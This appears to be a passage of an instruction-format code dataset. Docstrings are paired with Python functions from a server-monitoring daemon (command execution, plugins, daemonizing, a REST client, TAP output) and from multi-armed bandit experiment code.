[/INST] def run_command(self, command, timeout=0): + result = Result() + lg.debug("Plugin %s: executing command %s" % (self.name, command)) + try: + stdout, stderr, returncode = smoker.util.command.execute( + command, timeout=timeout) + except smoker.util.command.ExecutionTimeout as e: + raise PluginExecutionTimeout(e) + except Exception as e: + lg.exception(e) + raise PluginExecutionError( + "Can't execute command %s: %s" % (command, e)) + if returncode: + status = 'ERROR' + else: + status = 'OK' + if self.params['Parser']: + try: + result = self.run_parser(stdout, stderr) + except Exception as e: + result.set_status('ERROR') + result.add_error(re.sub('^\n', '', stderr.strip())) + result.add_error('Parser run failed: %s' % e) + result.add_info(re.sub('^\n', '', stdout.strip())) + else: + json = None + try: + json = simplejson.loads(stdout) + except: + pass + if json: + if 'status' in json and json['status'] in [ 'OK', 'ERROR', 'WARN' ]: + try: + result.set_result(json, validate=True) + except ValidationError as e: + raise PluginMalformedOutput("Invalid JSON structure: %s" % e) + else: + raise PluginMalformedOutput("Missing status in JSON output: %s" % json) + else: + lg.debug("Plugin %s: using non-JSON output" % self.name) + result.set_status(status) + if stderr: + result.add_error(re.sub('^\n', '', stderr.strip())) + if stdout: + result.add_info(re.sub('^\n', '', stdout.strip())) + return result +[INST] Run parser on given stdout/stderr +Raise exceptions if anything happen. [/INST] def run_parser(self, stdout, stderr): + lg.debug("Plugin %s: running parser %s" % (self.name, self.params['Parser'])) + if stdout: + lg.debug("Plugin %s: stdout: %s" % (self.name, stdout.strip())) + if stderr: + lg.debug("Plugin %s: stderr: %s" % (self.name, stderr.strip())) + try: + parser = __import__(self.params['Parser'], globals(), locals(), ['Parser'], 0) + except ImportError as e: + lg.error("Plugin %s: can't load parser %s: %s" % (self.name, self.params['Parser'], e)) + raise + try: + parser = parser.Parser(stdout, stderr) + except Exception as e: + lg.error("Plugin %s: can't initialize parser: %s" % (self.name, e)) + lg.exception(e) + raise + try: + result = parser.parse() + except Exception as e: + lg.error("Plugin %s: parser execution failed: %s" % (self.name, e)) + lg.exception(e) + raise + return result +[INST] Run Python module +Raise exceptions if anything happen. [/INST] def run_module(self, module, **kwargs): + lg.debug("Plugin %s: running module %s" % (self.name, module)) + try: + plugin = __import__(module, globals(), locals(), ['Plugin'], 0) + except ImportError as e: + lg.error("Plugin %s: can't load module %s: %s" % + (self.name, module, e)) + raise + try: + plugin = plugin.Plugin(self, **kwargs) + except Exception as e: + lg.error("Plugin %s: can't initialize plugin module: %s" % + (self.name, e)) + lg.exception(e) + raise + signal.signal(signal.SIGALRM, alarm_handler) + if 'timeout' not in kwargs: + kwargs['timeout'] = self.get_param('Timeout', default=120) + try: + signal.alarm(kwargs['timeout']) + result = plugin.run() + if not result: + result = plugin.result + except PluginExecutionTimeout: + result = self.error_result( + 'Plugin execution exceeded timeout %d seconds' % + kwargs['timeout']) + except Exception as e: + lg.error("Plugin %s: module execution failed: %s" % (self.name, e)) + lg.exception(e) + signal.alarm(0) + raise + signal.alarm(0) + return result +[INST] Run plugin, save result and schedule next run. 
[/INST] def run_plugin(self, force=False): + if self.params['Command']: + command = self.params['Command'] % self.escape(dict(self.params)) + try: + result = self.run_command(command, self.params['Timeout']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + result = self.error_result(e) + elif self.params['Module']: + try: + result = self.run_module(self.params['Module']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + result = self.error_result( + re.sub('^\n', '', ('%s' % e).strip())) + else: + lg.error("Plugin %s: no Command or Module to execute!" % self.name) + result = self.error_result('No Command or Module to execute!') + if self.params['Action']: + lg.debug("Plugin %s: executing action" % self.name) + if self.params['Action']['Command']: + params = dict(self.params, **result.result) + params = self.escape(params) + try: + action = self.run_command( + self.params['Action']['Command'] % + params, timeout=self.params['Action']['Timeout']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + action = self.error_result(e) + elif self.params['Action']['Module']: + try: + action = self.run_module( + self.params['Action']['Module'], result=result) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + action = self.error_result(e) + else: + lg.error("Plugin %s: no Action Command or Module to execute!" % + self.name) + action = self.error_result('No Command or Module to execute!') + result.set_action(action) + result.set_forced(force) + try: + self.result = result.get_result() + except ValidationError as e: + lg.error("Plugin %s: ValidationError: %s" % (self.name, e)) + result = self.error_result('ValidationError: %s' % e) + result.set_forced(force) + self.result = result.get_result() + lg.info("Plugin %s result: %s" % (self.name, result.get_result())) +[INST] Escape given string, dictionary or list +If int, None or bool item is found, just pass +Also pass if item can't be escaped by some other reason +Raise exception if unknown data type. [/INST] def escape(self, tbe): + if isinstance(tbe, dict): + escaped = {} + for key, value in tbe.items(): + if type(value) in [int, type(None), bool]: + escaped[key] = value + else: + try: + escaped[key] = re.escape(value) + except: + escaped[key] = value + elif isinstance(tbe, basestring): + try: + escaped = re.escape(tbe) + except: + escaped = tbe + elif isinstance(tbe, int) or isinstance(tbe, bool): + escaped = tbe + elif isinstance(tbe, list): + escaped = [] + for value in tbe: + if type(value) in [int, type(None), bool]: + escaped.append(value) + else: + try: + escaped.append(re.escape(value)) + except: + escaped.append(value) + else: + raise Exception("Unknown data type") + return escaped +[INST] close unnecessary open sockets cloned on fork. [/INST] def close_unnecessary_sockets(self): + open_sockets = list() + allowed = ['socket.socket', 'socket._socketobject'] + for x in gc.get_objects(): + if any(t for t in allowed if t in repr(type(x))): + open_sockets.append(x) + for cur_socket in open_sockets: + if cur_socket.type == socket.SOCK_STREAM: + cur_socket.close() +[INST] Add message into result +Empty messages are skipped + +don't split message lines into +multiple messages. 
[/INST] def add_msg(self, level, msg, multiline=False): + if not self.result['messages']: + self.result['messages'] = { + 'info' : [], + 'error': [], + 'warn' : [], + } + if not multiline: + messages = str(msg).split('\n') + else: + messages = [str(msg)] + for message in messages: + if not str(msg).strip(): + continue + try: + self.result['messages'][level].append(str(message).strip()) + except KeyError: + raise InvalidArgument("Level has to be info, error or warn") +[INST] Validate result +Skip if it was already validated to avoid +unwanted re-validation. [/INST] def validate(self, force=False): + if force != True and self.validated == True: + return True + else: + try: + self._validate_status(self.result['status']) + self._validate_msg(self.result['messages']) + self._validate_component_result(self.result['componentResults']) + self._validate_action(self.result['action']) + finally: + self.validated = True +[INST] Execute smoker.util.command.execute() with timeout (default 120 seconds) +You shouldn't use anything else than this function from inside plugins!. [/INST] def execute(self, command, **kwargs): + if 'timeout' not in kwargs: + kwargs['timeout'] = self.plugin.get_param('Timeout', default=120) + return smoker.util.command.execute(command, **kwargs) +[INST] Convert next run timestamp object to the ISO format. [/INST] def next_run_iso_format(next_run): + if isinstance(next_run, bool): + next_run = None + else: + next_run = next_run.isoformat() + return next_run +[INST] Convert result dict to list just to have standardized API. [/INST] def standardized_api_list(component): + keyword = 'componentResults' + if (not isinstance(component, dict) or + keyword not in component or + not component[keyword]): + return component + results = dict(component) + results[keyword] = [] + for key, value in component[keyword].items(): + value['name'] = key + results[keyword].append({'componentResult': value}) + return results +[INST] Print information about set of plugins. [/INST] def print_plugins(plugins, forced=False): + plugins_result = [] + for plugin in plugins: + plugins_result.append(print_plugin(plugin, forced)) + return {'plugins': {'items': plugins_result}} +[INST] Format json info about process in progress. [/INST] def print_in_progress(id): + location = '/processes/%d' % id + data = { + 'asyncTask': { + 'link': { + 'poll': location + } + } + } + response = make_response(json.dumps(data, indent=2)) + response.status = 'Accepted' + response.status_code = 202 + response.headers['Location'] = location + response.headers['content-type'] = 'application/json' + return response +[INST] Execute command, wrapper for Command class. [/INST] def execute(command, timeout=None, **kwargs): + cmd = Command(command, **kwargs) + return cmd.run(timeout) +[INST] Send signal to whole process tree +By default send SIGTERM (15). +If process doesn't exist, just pass. 
[/INST] def signal_ptree(pid, signal=15): + try: + process = psutil.Process(pid) + except psutil.NoSuchProcess: + return + children = get_ptree(process) + lg.info('Sending signal to process tree: signal=%s pid=%s process=%s children=%s' % (signal, process.pid, process.name, len(children))) + if children: + for child in children: + try: + lg.info('Sending signal to child process: signal=%s pid=%s process=%s' % (signal, child.pid, child.name)) + os.kill(child.pid, signal) + except OSError as e: + if e.errno == 3: + lg.debug('Children process does not exist: pid=%s process=%s' % (child.pid, child.name)) + continue + try: + lg.info('Sending signal to parent process: signal=%s pid=%s process=%s' % (signal, process.pid, process.name)) + os.kill(process.pid, signal) + except OSError as e: + if e.errno == 3: + lg.debug('Parent process does not exist: pid=%s process=%s' % (process.pid, process.name)) + pass +[INST] Register cleanup function for given process id. [/INST] def _register_cleanup(pid): + lg.debug("Registering cleanup for pid %s" % pid) + atexit.register(_proc_cleanup, pid) +[INST] Unregister cleanup function for given process id. [/INST] def _unregister_cleanup(pid): + lg.debug("Unregistering cleanup for pid %s" % pid) + if _PY3: + atexit.unregister(_proc_cleanup) + return + for handler in atexit._exithandlers: + (func, args, kwargs) = handler + if func == _proc_cleanup and args == (pid,): + atexit._exithandlers.remove(handler) +[INST] Run command with given timeout. +Return tuple of stdout, stderr strings and retval integer.. [/INST] def run(self, timeout=None, timeout_sigterm=3, timeout_sigkill=5): + def target(): + try: + self.process = subprocess.Popen(self.command, **self.kwargs) + _register_cleanup(self.process.pid) + self.stdout, self.stderr = self.process.communicate() + self.stdout = self.stdout.decode('utf-8').strip() if self.stdout else '' + self.stderr = self.stderr.decode('utf-8').strip() if self.stderr else '' + self.returncode = self.process.returncode + except Exception as e: + self._exception = e + return e + thread = threading.Thread(target=target) + lg.debug("Executing command: command='%s' %s" + % (self.command, ' '.join('%s=%s' % (a, b) for a, b in self.kwargs.items()))) + time_start = datetime.datetime.now() + thread.start() + if timeout: + thread.join(timeout) + if thread.is_alive(): + signal_ptree(self.process.pid) + thread.join(timeout_sigterm) + if thread.is_alive(): + signal_ptree(self.process.pid, signal=9) + thread.join(timeout_sigkill) + if thread.is_alive(): + _unregister_cleanup(self.process.pid) + raise ThreadDeadlock("Process %s deadlocked thread %s" % (self.process.pid, thread.name)) + _unregister_cleanup(self.process.pid) + raise ExecutionTimeout("Execution timeout after %s seconds" % timeout) + else: + thread.join() + if self._exception: + _unregister_cleanup(self.process.pid) + raise self._exception + lg.debug("Command execution done: time=%s returncode=%s" % + ((datetime.datetime.now() - time_start).seconds, self.returncode)) + _unregister_cleanup(self.process.pid) + return (self.stdout, self.stderr, self.returncode) +[INST] Main entrance +check peers status +check volumes status +try to mount and unmount volume. 
[/INST] def run(self): + volume = self.plugin.get_param('Volume') + try: + self.check_peers() + except Exception as e: + self.result.add_component('Peers', 'ERROR', error=["Can't check peers: %s" % e]) + lg.exception(e) + try: + self.check_volumes() + except Exception as e: + self.result.add_component('Volumes', 'ERROR', error=["Can't check volumes: %s" % e]) + lg.exception(e) + if volume: + try: + self.mount(volume) + except Exception as e: + self.result.add_component('Mount', 'ERROR', error=["Can't mount volume: %s" % e]) + lg.exception(e) + self.result.set_status() + return self.result +[INST] Check peers status +and add component result. [/INST] def check_peers(self): + peers = self.getPeersStatus() + status = 'OK' + messages = { + 'info' : [], + 'error': [], + 'warn' : [], + } + for host, peer in peers.items(): + if peer['connected'] == True: + messages['info'].append('Peer %s is healthy: %s (Connected)' % (host, peer['status'])) + else: + messages['error'].append('Peer %s is not healthy: %s (Disconnected)' % (host, peer['status'])) + status = 'ERROR' + self.result.add_component('Peers', status, **messages) +[INST] Check volumes status +and add component result. [/INST] def check_volumes(self): + volumes = self.getVolumesStatus() + status = 'OK' + messages = { + 'info' : [], + 'error': [], + 'warn' : [], + } + if len(volumes) < 1: + messages['error'].append("No configured volumes found") + status = 'ERROR' + for vol, nodes in volumes.items(): + if nodes['status'] != 1: + failed = [] + for node, status in nodes.items(): + if node != 'status' and status != 1: + failed.append(node) + messages['error'].append("Volume %s is not healthy (failed nodes: %s)" % (vol, ', '.join(failed))) + status = 'ERROR' + else: + messages['info'].append("Volume %s is healthy" % vol) + self.result.add_component('Volumes', status, **messages) +[INST] Run daemon +change effective uid/gid +start thread for each check +start webserver. 
[/INST] def run(self): + lg.info("Starting daemon") + if 'uid' in self.conf and 'gid' in self.conf: + if os.geteuid != self.conf['uid'] and os.getegid != self.conf['gid']: + try: + os.setegid(self.conf['gid']) + os.seteuid(self.conf['uid']) + except TypeError as e: + lg.error("Config parameters uid/gid have to be integers: %s" % e) + except OSError as e: + lg.error("Can't switch effective UID/GID to %s/%s: %s" % (self.conf['uid'], self.conf['gid'], e)) + lg.exception(e) + self._shutdown(exitcode=1) + else: + lg.info("Not changing effective UID/GID, keeping %s/%s" % (os.geteuid(), os.getegid())) + if not isinstance(self.conf['bind_port'], int): + lg.error("Config parameter bind_port has to be integer") + config = {} + for key in ['plugins', 'templates', 'actions']: + try: + config[key] = self.conf[key] + except KeyError as e: + lg.warn("Config section not found: %s" % e) + if not config['plugins']: + lg.error('No configured plugins') + self._shutdown(exitcode=1) + if 'nr_concurrent_plugins' in self.conf: + config['semaphore_count'] = self.conf['nr_concurrent_plugins'] + try: + self.pluginmgr = PluginManager(**config) + except Exception as e: + lg.error("Can't initialize PluginManager") + lg.exception(e) + self._shutdown(exitcode=1) + lg.info("Starting webserver on %(bind_host)s:%(bind_port)s" + % self.conf) + try: + self.server = RestServer(self) + self.server.start() + except Exception as e: + lg.error("Can't start HTTP server: %s" % e) + lg.exception(e) + self._shutdown(exitcode=1) + if hasattr(signal, 'SIGINT'): + signal.signal(signal.SIGINT, self._shutdown) + if hasattr(signal, 'SIGTERM'): + signal.signal(signal.SIGTERM, self._shutdown) + if hasattr(signal, 'SIGHUP'): + signal.signal(signal.SIGHUP, self._reopen_logfiles) + self._watchdog() +[INST] Daemonize and run daemon +Use double-fork magic to do that + +Use sys.exit() here instead of self._shutdown() because we don't have running +daemon to shutdown in this function. [/INST] def daemonize(self): + if os.path.isfile(self.conf['pidfile']): + lg.error("PID file %s already exists" % self.conf['pidfile']) + sys.exit(1) + pid = os.fork() + if pid: + sys.exit(0) + os.chdir('/') + os.setsid() + os.umask(0) + pid = os.fork() + if pid: + sys.exit(0) + for log in ['stdout', 'stderr', 'stdin']: + path = os.path.dirname(self.conf[log]) + if not os.path.exists(path): + os.mkdir(path) + redirect_standard_io(self.conf) + try: + fh = open(self.conf['pidfile'], 'w') + fh.write(str(os.getpid())) + fh.flush() + fh.close() + except Exception as e: + lg.error("Can't write PID into pidfile: %s" % e) + sys.exit(1) + try: + self.run() + except Exception as e: + self._shutdown(exitcode=1) + lg.exception(e) +[INST] Shutdown smoker daemon (internal use) +exitcode - exit code number (default 0) +signum, frame - used by signal handler +exception - if True, raise on exception, otherwise just log it and pass. [/INST] def _shutdown(self, signum=None, frame=None, exitcode=0, exception=False): + if self.pluginmgr and self.pluginmgr.stopping: + return + lg.info("Shutting down") + try: + if self.server: + try: + self.server.terminate() + self.server.join() + except AttributeError: + pass + if self.pluginmgr: + self.pluginmgr.stop() + if os.path.isfile(self.conf['pidfile']): + os.remove(self.conf['pidfile']) + except Exception as e: + lg.exception(e) + if exception: + raise + sys.exit(exitcode) +[INST] Get client configuration from smokercli.yaml. 
[/INST] def _load_config(): + conf_file = os.path.expanduser('~/.smokercli.yaml') + if not os.path.exists(conf_file): + conf_file = CONFIG_FILE + if not os.path.exists(conf_file): + return None + with open(conf_file) as f: + config = yaml.safe_load(f) + return config +[INST] Get list of available host discovery plugin module names. [/INST] def _get_plugins(config): + plugins = [] + if config and 'plugin_paths' in config: + paths = config['plugin_paths'] + else: + raise Exception('Invalid config file') + for path in paths: + try: + module = __import__(path) + except ImportError: + raise Exception('Invalid config file') + toplevel = os.path.dirname(module.__file__) + submodule = '/'.join(path.split('.')[1:]) + plugin_dir = os.path.join(toplevel, submodule, '*.py') + modules = [os.path.basename(name)[:-3] for name in + glob.glob(plugin_dir)] + modules.remove('__init__') + plugins += ['%s.%s' % (path, name) for name in modules] + return plugins +[INST] Add host discovery plugin specific options to the cmdline argument parser. [/INST] def _add_plugin_arguments(parser, config): + plugins = _get_plugins(config) + if not plugins: + return + argument_group = parser.add_argument_group('Plugin arguments') + for plugin in plugins: + args = _get_plugin_arguments(plugin) + for argument in args: + argument_group.add_argument(*argument.args, **argument.kwargs) +[INST] Dump plugins result to TAP +Take OK and also WARN statuses as ok +Print only error and warn results. [/INST] def dump_tap(plugins): + tap = Tap() + for name in sorted(plugins): + host = plugins[name] + if host['status'] in ['OK', 'WARN']: + host_ok = True + else: + host_ok = False + tap_host = TapTest(name, host_ok) + tap.add_test(tap_host) + for key in sorted(host['plugins']): + plugin = host['plugins'][key] + if not plugin['lastResult']: + plugin_ok = False + else: + if plugin['lastResult']['status'] in ['OK', 'WARN']: + plugin_ok = True + else: + plugin_ok = False + messages = [] + if plugin['lastResult']: + if plugin['lastResult']['messages']: + messages = plugin['lastResult']['messages'] + tap_plugin = TapTest(plugin['name'], plugin_ok, messages) + tap_host.add_subtest(tap_plugin) + if (plugin['lastResult'] and + plugin['lastResult']['componentResults']): + for component in plugin['lastResult']['componentResults']: + component = component['componentResult'] + if component['status'] in ['OK', 'WARN']: + component_ok = True + else: + component_ok = False + messages = [] + if component['messages']: + if component['messages']: + messages = component['messages'] + tap_component = TapTest(component['name'], component_ok, + messages) + tap_plugin.add_subtest(tap_component) + return tap.dump() +[INST] Add count of items as done. [/INST] def add_done(self, count=1): + assert isinstance(count, numbers.Integral), "Count must be integral number" + self.items_done += count +[INST] Run thread +While we have undone items, print progressbar. [/INST] def run(self): + while self.items_done < self.items_count: + try: + width, height = console.get_terminal_size() + except IOError: + width, height = (80, 37) + sys.stdout.write('\r%s' % (width * ' ')) + sys.stdout.write('\r %s' % self.get_progress()) + sys.stdout.flush() + time.sleep(self.speed) +[INST] This function has to be called after progress bar stop to do the cleanup. [/INST] def stop(self): + print() +[INST] Accept list pool of threads, watch if they are alive and update progress. 
[/INST] def wait_pool(self, pool): + assert isinstance(pool, list), "Parameter pool must be list of Thread objects" + while self.get_left(): + done = 0 + for t in pool: + assert isinstance(t, threading.Thread),\ + "Object in pool must be instance of threading.Thread not %s" % type(t) + if not t.is_alive(): + done += 1 + self.set_done(done) + time.sleep(1) +[INST] Check if plugin passes supplied filters. [/INST] def _match_filters(self, plugin, filters, negative=False, exclude_plugins=None): + if exclude_plugins: + if plugin['name'] in exclude_plugins: + return False + match_result = lambda match: not match if negative else match + match = True + for filter in filters: + if isinstance(filter, tuple): + key, value = filter + if key == 'status' and isinstance(value, list): + try: + if plugin['lastResult']['status'] in value: + match = True + if not negative: continue + else: break + else: + match = False + break + except (KeyError, TypeError): + if 'UNKNOWN' in value: + match = True + if not negative: continue + else: break + else: + match = False + break + elif isinstance(filter, dict): + try: + if plugin['parameters'][filter['key']] == filter['value']: + lg.debug("Plugin %s matched filter %s = %s" % (plugin['name'], filter['key'], filter['value'])) + match = True + if not negative: continue + else: break + else: + lg.debug("Plugin %s doesn't match filter %s = %s" % (plugin['name'], filter['key'], filter['value'])) + match = False + break + except KeyError: + lg.debug("Plugin %s doesn't have filter parameter %s" % (plugin['name'], filter['key'])) + match = False + break + elif isinstance(filter, list): + if plugin['name'] in filter: + lg.debug("Plugin %s matched requested plugins list" % plugin['name']) + match = True + continue + else: + match = False + lg.debug("Plugin %s doesn't match requested plugins list" % plugin['name']) + break + match = match_result(match) + return match +[INST] Open given uri in parallel and +get JSON-parsed result. [/INST] def open(self, uri=None, resource=None, data=None): + if not uri and not resource: + raise Exception("Argument uri or resource have to be submitted") + pool = [] + for host in self.hosts: + t = threading.Thread(name=host.name, target=host.open, args=(uri, resource, data,)) + t.daemon = True + t.start() + pool.append(t) + self.wait(pool) + result = {} + for host in self.hosts: + result[host.name] = host.get_result() + return result +[INST] Wait until all threads in pool are done. [/INST] def wait(self, pool): + done = False + while not done: + done = True + for t in pool: + if t.is_alive(): + done = False + time.sleep(0.5) +[INST] Wait until all threads in pool are done +and show nice progress bar. [/INST] def wait_progress(self, pool): + try: + with ProgressBar(len(pool)) as progress: + progress.wait_pool(pool) + except NonInteractiveError as e: + lg.warn(e) + self.wait(pool) +[INST] Open given uri and get JSON-parsed result. 
[/INST] def open(self, uri=None, resource=None, data=None, timeout=20): + if not uri and not resource: + raise Exception("Argument uri or resource have to be submitted") + if resource: + try: + uri = self.links[resource]['href'] + except KeyError: + lg.error("Can't find resource %s" % resource) + return False + if data: + data = data.encode('utf-8') + url = '%s%s' % (self.url, uri) + lg.info("Host %s: requesting url %s" % (self.name, url)) + try: + fh = urllib.request.urlopen(url, timeout=timeout, data=data) + except Exception as e: + lg.error("Host %s: can't open resource %s: %s" % (self.name, url, e)) + return False + fh = fh.read() + if not _PY3: + fh = fh.decode('utf-8') + try: + json = simplejson.loads(fh) + except Exception as e: + lg.error("Host %s: can't load response as JSON: %s" % (self.name, e)) + return False + self._result = json + return json +[INST] Force plugin run +Poll process until result. [/INST] def force_run(self, plugins): + plugins_list = list(plugins.keys()) + data = simplejson.dumps({ + 'process' : { + 'plugins' : plugins_list, + } + }) + lg.info("Forcing run of %d plugins on host %s" % (len(plugins_list), self.name)) + process = self.open(resource='processes', data=data) + if process: + poll = process['asyncTask']['link']['poll'] + return self.poll(uri=poll) + else: + return False +[INST] Print number of hosts in result. [/INST] def count_hosts(self): + return len(self) +[INST] Dump all tests into tap structure. [/INST] def dump(self): + dump = [] + dump.append('1..%s' % len(self.tests)) + for test in self.tests: + dump.append(test.dump()) + return '\n'.join(dump) +[INST] Add TapTest instance as subtest +Return subtest index. [/INST] def add_subtest(self, test): + test.index = self.subtests_index + self.subtests.append(test) + self.subtests_index += 1 + return test.index +[INST] Dump TapTest result into TAP +Should be used from Tap instance to dump all results + +Dump messages in YAMLish format. [/INST] def dump(self): + dump = [] + dump.append('%s %s - %s' % (self.status, self.index, self.name)) + if self.messages: + messages = [] + for key, values in self.messages.items(): + if values: + messages.append('\t- %s:' % key) + for msg in values: + messages.append("\t\t- %s" % msg) + if messages: + messages.insert(0, '---') + messages.append('...') + dump.append('\n'.join(messages)) + if self.subtests: + dump_subtests = [] + dump_subtests.append('\t1..%s' % len(self.subtests)) + for test in self.subtests: + dump_subtests.append(test.dump()) + dump.append(re.sub('\n', '\n\t', '\n'.join(dump_subtests))) + return '\n'.join(dump) +[INST] Match value with defined template field.. [/INST] def m_eq(value, templ_value): + retMatch = None + retBoundName = None + m_t = m_regex.match(templ_value) + if m_t: + gd = m_t.groupdict() + if gd.get('bound'): + retBoundName = gd['bound'] + retMatch = True + if gd.get('re_bound'): + retMatch = re.match(gd['re_bound'], value) + if gd.get('re'): + retMatch = re.match(gd['re'], value) + if gd.get('re_bound_neg'): + retMatch = not re.match(gd['re_bound_neg'], value) + if gd.get('re_neg'): + retMatch = not re.match(gd['re_neg'], value) + if gd.get('type'): + retMatch = isinstance(value, m_get_type(gd['type'])) + if gd.get('literal'): + retMatch = value == gd['literal'] + if gd.get('normal'): + retMatch = value == gd['normal'] + return retMatch, retBoundName +[INST] Will return proper instance of namedtuple (all named Row).. 
[/INST] def row_tuple(fields_str, additional_fields=None): + def mk__getattr__(additional_fields): + def _attr_f(t, self, name): + if t and name in t: + return string.Template(t[name]).safe_substitute(**self._asdict()) + return None + return lambda self, name: _attr_f(additional_fields, self, name) + if fields_str not in _tuple_cache: + Row = collections.namedtuple('Row', fields_str) + Row.__getattr__ = mk__getattr__(additional_fields=additional_fields) + Row.__str = Row.__str__ + Row.__str__ = lambda t: ( + '|<| ' + + ' | '.join('%s: %s' % (f, getattr(t, f)) for f in t._fields) + + ' |>|') + _tuple_cache[fields_str] = Row + return _tuple_cache[fields_str] +[INST] Extend attribute of `Row` namedtuple. +Return `None` on invalid field. +Return formatted string when name is in TEMPLATE dictionary.. [/INST] def mk__getattr__(additional_fields): + def _attr_f(t, self, name): + if t and name in t: + return string.Template(t[name]).safe_substitute(**self._asdict()) + return None + return lambda self, name: _attr_f(additional_fields, self, name) +[INST] Object is iterable but not string.. [/INST] def is_iterable(s): + if isinstance(s, (str, bytes)): + return False + return hasattr(s, '__iter__') +[INST] Make sure dictionary and/or list iterate with same protocol.. [/INST] def iter_tuplepairs(structure): + if isinstance(structure, (str, bytes)): + return tuple() + elif isinstance(structure, collections.Mapping): + return iteritems(structure) + elif isinstance(structure, collections.Sequence) or is_iterable(structure): + return enumerate(structure) + else: + return tuple() +[INST] Integral type is only type that this function can verify. +But it's okay, don't really need more types.. [/INST] def m_get_type(val): + tp = ''.join(val.split('!')) + if tp == 'Integral': + import numbers + return numbers.Integral + return None +[INST] Step down the template dict to the proper sub-branch.. [/INST] def delve_in_template(templ, name, value): + if name is not None: + return templ['$' + name] + elif value in templ: + return templ[value] + types = list(filter(lambda x: x.startswith('!'), + iter(templ.keys()))) + for t in types: + if isinstance(value, m_get_type(t)): + return templ[t] + raise IndexError("(VALUE: %s) or (PATTERN: %s) not in '%s'" % (value, name, templ)) +[INST] Decision predicate if current captured fields satisfy matching rules and can delve further.. [/INST] def m_field_dicts(data_fields, templ): + def fields_only(d): + flds = {} + for field_candidate, value in d.items(): + if is_scalar(value): + flds[field_candidate] = value + return flds + def satisfy_fields(d, t): + retVal = tuple() + template_fields = fields_only(t) + plain_fields = list(itertools.filterfalse(lambda s: s.startswith('$'), + iter(template_fields.keys()))) + if set(d.keys()).issuperset(set(plain_fields)): + for f in plain_fields: + match, bound_name = m_eq(d[f], t[f]) + if not match: + return None, tuple() + if bound_name: + retVal = retVal + ((bound_name, d[f]),) + return True, retVal + return None, tuple() + return satisfy_fields(data_fields, templ) +[INST] Reinitialize bandit for a new run when running in serial or parallel. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.Q = deepcopy(self.Q_init) + self.Na = {a: 0 for a in self.Q} + self.At = self.argmax(self.Q) +[INST] Return max estimate Q, if tie between actions, choose at random between tied actions. 
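Editor's aside: a standalone illustration of the technique behind `row_tuple` above, which attaches a `__getattr__` to a namedtuple class so that unknown attributes are rendered from `string.Template` patterns. The field names and the `summary` template are made up for illustration; unknown non-template names return None, mirroring the original.

import collections
import string

Row = collections.namedtuple('Row', 'host status')
templates = {'summary': '$host is $status'}

def _virtual(self, name):
    # render virtual fields from templates using the tuple's real fields
    if name in templates:
        return string.Template(templates[name]).safe_substitute(**self._asdict())
    return None

Row.__getattr__ = _virtual

r = Row(host='web01', status='OK')
print(r.summary)   # -> "web01 is OK"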
[/INST] def argmax(self, Q): + Q_array = np.array(list(self.Q.values())) + At = np.argwhere(Q_array == np.max(Q_array)).flatten().tolist() + if len(At) > 1: + At = np.random.choice(At) + else: + At = At[0] + return list(Q.keys())[At] +[INST] Run bandit for specified number of steps and optionally multiple runs. [/INST] def run(self, testbed, steps, n_runs=1, n_jobs=4, serial=False): + if serial: + self.action_values = self._serialrun(testbed, steps, n_runs) + elif n_runs >= 4: + if n_jobs > cpu_count(): + warnings.warn( + f"Warning: running n_jobs: {n_jobs}, with only {cpu_count()} cpu's detected", + RuntimeWarning, + ) + self.action_values = self._multirun(testbed, steps, n_runs, n_jobs=n_jobs) + else: + self.action_values = self._serialrun(testbed, steps, n_runs) +[INST] Reshape action_values numpy array and output as pandas dataframe. [/INST] def output_df(self): + n_rows = self.action_values.shape[2] * self.action_values.shape[0] + df = pd.DataFrame( + data=self.action_values.transpose(2, 0, 1).reshape(-1, len(self.columns)), + columns=self.columns, + ) + return df +[INST] Reshape action_values numpy array and output as pandas dataframe +Add epsilon coefficient used for greedy bandit. [/INST] def output_df(self): + df = super().output_df() + df["epsilon"] = self.epsilon + return df +[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.Q = deepcopy(self.Q_init) + self.Na = {a: 1e-100 for a in self.Na} +[INST] Reshape action_values numpy array and output as pandas dataframe +Add c coefficient used for UCL. [/INST] def output_df(self): + df = super().output_df() + df["c"] = self.c + return df +[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.H = deepcopy(self.Q_init) + self.Q = deepcopy(self.Q_init) + self.Na = {a: 0 for a in self.Q} +[INST] Reshape action_values numpy array and output as pandas dataframe +Add learning rate. [/INST] def output_df(self): + df = super().output_df() + df["lr"] = self.lr + return df +[INST] Average all dataframe columns across runs. [/INST] def average_runs(df, group=[]): + return df.groupby(["step"] + group).mean().reset_index() +[INST] Write scalars to local using aim +Return +Value of last step. [/INST] def write_scalars(df, session, column: str, tag: str, hp: dict): + df = average_runs(df) + df.apply( + lambda x: session.track( + x[column], + epoch=int(x.step), + name=tag, + ), + axis=1, + ) + return df[column].iloc[-1] +[INST] Provide an estimate of the testbed values across all arms +n (int): Number of iterations to execute in testbed. [/INST] def estimate_distribution(self, n=1000) -> pd.DataFrame: + self.p_drift = 0.0 + R = pd.DataFrame(columns=["reward", "action", "strategy"]) + for a in self.expected_values: + Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"]) + Ra["action"] = a + Ra["strategy"] = "uniform" + R = pd.concat([R, Ra]) + if self.initial_ev != self.expected_values: + self.expected_values = deepcopy(self.initial_ev) + for a in self.initial_ev: + Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"]) + Ra["action"] = a + Ra["strategy"] = "uniform" + R = pd.concat([R, Ra]) + return R +[INST] Return true best action that should have been taken based on EV state. 
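Editor's aside: a standalone sketch of the random tie-breaking argmax used by the bandit code above; the example Q values are arbitrary.

import numpy as np

def argmax_random_tiebreak(Q):
    # Q maps action -> estimated value; ties are broken uniformly at random
    values = np.array(list(Q.values()))
    best = np.argwhere(values == values.max()).flatten()
    choice = np.random.choice(best)
    return list(Q.keys())[choice]

Q = {'a': 1.0, 'b': 2.5, 'c': 2.5}
print(argmax_random_tiebreak(Q))   # prints 'b' or 'c'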
